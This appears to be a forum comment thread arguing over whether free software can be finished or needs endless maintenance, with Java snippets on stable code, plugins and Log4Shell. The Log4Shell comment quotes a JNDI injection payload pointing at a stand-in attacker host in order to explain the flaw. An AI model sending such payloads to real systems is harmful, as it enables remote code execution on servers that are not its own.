You only have to build the alternative once. Yes, there have been some areas where proprietary software has held its ground, but it has done just that: held its ground. It has not won back the areas that free software already controls.
The takeover of free software may be slow, but it is one-directional.
I wish this were true! But keeping your software current in 2022 is a continuous project. UIs improve, platforms shift, features expand, vulns appear, needs change, server bills need to be paid.
I think this is a self-aggrandizing myth that is common in forums like HN with lots of programmers and designers:
- UIs usually do not improve. They "improve" by making subjective changes for the benefit of the maker (often at the cost of the user).
- Platforms are constantly shifting when they are owned by corporations. At first, businesses will penetrate the market by creating a competitive platform. Once their platform has reached critical market share, they will switch to milking their users who are now trapped due to vendor lock-in. This forces users of proprietary software to constantly jump ship in order to get a good deal.
- Features sometimes expand, but most apps will reach a point where it no longer makes sense to add additional features. In the free-software world, we generally try to make an ecosystem of programs that work together: if a single program is too complex, its features may be divided into several smaller programs. In the corporate world, a single program may be bloated and expanded long past the point at which additional complexity serves the user, so long as developers can continue to invent new ways to extract money, data, etc. from their users.
- New vulnerabilities may be uncovered, but generally vulnerabilities are only added when the complexity of a program increases. Vulnerabilities don't just appear out of nowhere. If you write a program, it doesn't become more vulnerable over time merely by virtue of being old.
- Server bills usually need to be paid because people have inserted themselves as middlemen. If the internet were designed in a way that did not require paying a racketeering fee for DNS, PKI, etc., then we would see a lot of decentralized alternatives to "essential" services.
It's hard for me to entirely put into words how flawed your statement is. If you have time, you may want to check out a book called "Bullshit Jobs: A Theory" by David Graeber (https://libgen.gs/edition.php?id=5852679). It might give you a new perspective on the software industry.
Man, I couldn't disagree more strongly! Programming is like building a house on shifting sand. How many projects that you haven't touched in the last 5 years still run? If you're anything like me, the percentage is vanishingly small - and my old projects aren't even that complicated. If you find that this is a belief "common in forums like HN with lots of programmers", I suspect that's because engineers are the most likely to have the hard-earned experience!
I mean, just look at HN for examples. Quite literally yesterday it happened again: Heroku decided to turn off all old free apps. That's a whole bunch of my old apps that are about to be shut off and break unless I do some work on them.
> Features sometimes expand, but most apps will reach a point where it no longer makes sense to add additional features.
I think this is overly idealistic, or perhaps limited to too small of a problem space. If your software stops adding features, it will quickly be out-competed by software which does have new features that improve productivity. I suppose you could argue that some apps are "finished", but I tend to see those as a rather small subset of all apps - things like single-use command-line utilities, say, like grep and awk. It's hard for me to fathom Photoshop ever being finished - until you're beaming ideas directly from brain to canvas, there's always the possibility that new features can save more time[1].
> Vulnerabilities don't just appear out of nowhere
But this is exactly what vulnerabilities do. One day, there isn't Heartbleed. The next day there is. One day, your Java dependencies are fine. The next day, log4j is broken for everyone on the internet. If you're not on call to solve problems like these, no one is going to use your app.
I don't really understand how you can say "[a program] doesn't just become more vulnerable over time just by merit of being old". This is exactly what happens to any program with dependencies.
> Server bills usually need to be paid because people have inserted themselves as middlemen
People have inserted themselves as middlemen because servers require upkeep, and keeping up a server takes the time of an experienced professional. They need to be patched for vulns (again), maybe you need to swap out your SSD because it finally ran out of writes, or deal with any of a litany of other problems.
[1]: Then again, with DALL-E, maybe this is happening sooner than we think - but that's beside the point.
> How many projects that you haven't touched in the last 5 years still run?
The ones that were built like a tank: adherence to standards, minimal dependencies, minimal assumptions about the platform, a non-flaky build system, and so on.
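To make that concrete, here's the kind of thing I mean (a made-up example, not from any real project): lean on nothing but the standard library and long-stable APIs, so the build is just the compiler.

    // Hypothetical example: standard library only, no framework, no build
    // tooling beyond the compiler. Every API used here has been stable
    // since Java 8, so `javac LineCount.java` works on any modern JDK.
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.List;

    public class LineCount {
        public static void main(String[] args) throws Exception {
            // Read the file named on the command line and print its line count.
            List<String> lines = Files.readAllLines(Paths.get(args[0]));
            System.out.println(lines.size() + " lines");
        }
    }

Nothing clever about it, but the dependency minimization and standards adherence are exactly what keeps it running a decade later.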
> If your software stops adding features, it will quickly be out-competed by software which does have new features
Not usually. You're probably thinking of things like web browsers.
> because servers require upkeep
If your software does not require continuously running global server(s) then that is not an issue.
>I mean, just look at HN for examples. Quite literally yesterday it happened again: Heroku decided to turn off all old free apps. That's a whole bunch of my old apps that are about to be shut off and break unless I do some work on them.
Yeah, pretty short-sighted of you to go out of your way to design those systems in a way that is dependent on a single company hosting them.
>I suppose you could argue that some apps are "finished", but I tend to see those as a rather small subset of all apps - things like single-use command-line utilities, say, like grep and awk. It's hard for me to fathom Photoshop ever being finished
In an ideal computing environment, the functionality of a single bloated program like Adobe Photoshop would be completely covered by an environment of general-purpose utilities, analogous to the way Unix shell programs can interact to perform a variety of tasks.
Modern operating systems are intentionally designed in a way that promotes the commercialization of software. For example, why is it that all third-party software on iOS or Android is packaged into distinct, sandboxed "apps", each with their own accompanying icons and whatnot? It's clear that the ability of these "apps" to perform any real inter-process communication is hampered because the boundaries of the apps represent the boundaries of different competing commercial entities. It is sort of like Conway's law, but in reverse: by enforcing a certain structure on the software that is distributed, you are selecting for a particular corporate development structure. The analogy goes much deeper than what I can currently find the words for. The whole system is quite insidiously woven together.
On these platforms it is impossible to run any sort of background process (for example, a daemon) that other running processes can talk to, yet apps are allowed to make outgoing network connections. This makes the user dependent on an intermediary that provides inter-app communication as a sort of internet-based service.
So I hear you say that software has to compete with the endless "upgrades" of its competitors. I think we have almost never seen a market in which free software based on the Unix philosophy has actually competed on its own terms. What we've seen is a market where free software competes on a commercial basis: producing a distinct, marketable product (as opposed to an environment of inter-working tools) that is comparable to an existing product, so that consumers find it familiar. The Unix shell environment is a rare example of an actually good idea coming out of commercial software, and it's a major foothold for the free software that has continued that legacy.
>But this is exactly what vulnerabilities do. One day, there isn't Heartbleed. The next day there is.
If a tree falls in the middle of a forest and no one hears it, does it make a sound?
If there's a bug in software but no one uncovers it, is it a vulnerability? Apparently not according to you.
There would be no Heartbleed if the mostly-useless heartbeat extension had never been implemented.
There would be no Log4Shell if the bloated JNDI lookup machinery had never been implemented.
You are correct: this is exactly what happens when programmers include many useless, bloated, and unvetted dependencies in their projects.
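To be concrete about what I mean, here is a rough sketch of why Log4Shell was a feature problem rather than an aging problem. The handler class is made up; the logging calls are the real log4j 2 API, assuming a vulnerable log4j-core (before 2.15.0) on the classpath.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    // Hypothetical application code; nothing here changed between the day
    // it was written and the day Log4Shell was announced.
    public class LoginHandler {
        private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

        void recordFailedLogin(String username) {
            // On vulnerable log4j-core versions (2.0-beta9 through 2.14.1),
            // the formatted message is scanned for ${...} lookups. A username
            // such as "${jndi:ldap://attacker.example/x}" makes the logger
            // itself perform a JNDI/LDAP fetch that can pull in remote code.
            LOG.warn("Failed login for {}", username);
            // The hole lives in lookup/JNDI machinery almost nobody asked for,
            // not in this application code and not in the passage of time.
        }
    }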
Here is the way I see it: at some point in your work, the utility-to-complexity tradeoff tapers off. There is an ideal version of every program that is bug-free and sits at the plateau of this utility-to-complexity curve. The purpose of all programming is to get close enough to that ideal system and finish: to make something that works well, reliably.
Saying that one must continuously revise a program forever to account for new features or vulnerabilities or service providers is like saying that you should continuously revise a book forever because you need to add another chapter, or fix another typo, or move to another publisher because Heroku stopped printing your book. The goal of writing is to produce a useful-enough book built on sound knowledge. If you are producing something that you think constantly deserves revision, then you are incompetent: either because you cannot recognize a finished product or because you cannot produce one.
The constant updating of commercial software with useless and inane features (much like a college textbook!) obviously serves a much more sinister motive than the one you've described here.
>People have inserted themselves as middlemen because servers require upkeep, and keeping up a server takes the time of an experienced professional. They need to be patched for vulns (again), maybe you need to swap out your SSD because it finally ran out of writes, or deal with any of a litany of other problems.
I see the fact that a service is critically dependent on a single server or maintainer as a design failure. Software should allow users to be more self-sufficient, not less. These centralized systems make you reliant on some sysadmin or someone who essentially performs a "useless job". Check out that book I linked earlier. It's an interesting read.
"It is difficult to get a man to understand something, when his salary depends on his not understanding it."
>> the fact that a service is critically dependent on a single server or maintainer as a design failure. Software should allow users to be more self-sufficient, not less.
Software allows users to be as self-sufficient as their skills and resources permit. There is room for a whole spectrum of users, and obviously, as developers, we fall on that spectrum as well.
Self-sufficiency, in any area, is expensive in time and money. I can grow my own food by buying land and devoting all day to farming. I'm self-sufficient, but I don't have time for anything else.
Equally, I can choose to spend time running my own servers. I can buy hardware, learn many things, make mistakes, but be self-sufficient.
However all that time spent is time I'm not focusing on my business. If my cousin runs a school, they want a "system that just works". They aren't interested in being self-sufficient. They don't have the time, or money, to (safely) host their own software. They are too busy adding value to their business elsewhere.
(Most) OSS to some extent solves a problem that only very few people have. It caters to those who are time-rich but cash-poor. Most people, though, are time-poor and can easily find cash to make problems go away.
Adobe wins over GIMP because it does more, faster, thus saving the user time. It's a lot easier to find money than time, so paying the subscription is trivial. If it saves an hour a month, you're ahead even at minimum-wage levels.
Of course there are those who value self-sufficiency, who seek out solutions that reduce, or remove, the supply chain. These folk exist in every part of society, and it is a perfectly good approach.
But it is worth understanding that this is a tiny subset of people. Most buy their food in a shop. Most are just using their computer to perform tasks. They have no more desire to write their own code, or host their own server, than they do to grow their own food.
I question the utility of most features Adobe adds to PS these days; but in any case, the problem is easily solved by building a robust plugin system and distributing the work.
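For what it's worth, the "robust plugin system" part doesn't have to be exotic. Here's a rough sketch using Java's standard ServiceLoader mechanism; the ImageFilter interface and the host class are invented for illustration.

    import java.util.ServiceLoader;

    // The core application defines one small, stable extension point...
    interface ImageFilter {
        String name();
        int[] apply(int[] pixels, int width, int height);
    }

    class FilterHost {
        public static void main(String[] args) {
            // ...and discovers third-party implementations at runtime.
            // A plugin jar ships its filter classes plus a
            // META-INF/services/<fully-qualified-interface-name> file listing
            // them; the core application never has to grow to absorb them.
            for (ImageFilter filter : ServiceLoader.load(ImageFilter.class)) {
                System.out.println("loaded filter: " + filter.name());
            }
        }
    }

New features then live and die as plugins instead of permanently bloating the core.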
I recently spent some time reviving an old piece of software (FLOSS, all server-side, the only UI being a CLI and an HTTP API) written for Node.js 8 and built mostly according to what was considered best practice at the time. I can confidently say you're missing important nuance here.
A counter-argument to this could be "most people were doing it wrong at the time and those best-practices proved to be not very sustainable so your old software was probably garbage already" but at that point we're entering the realm of dismissing reality.